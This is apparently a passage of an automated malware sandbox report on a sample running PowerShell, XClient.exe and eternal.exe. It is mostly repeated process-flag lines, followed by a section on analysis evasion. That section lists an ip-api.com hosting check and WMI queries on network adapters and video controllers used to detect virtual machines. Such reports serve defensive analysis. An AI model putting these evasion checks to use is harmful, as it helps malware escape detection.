                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
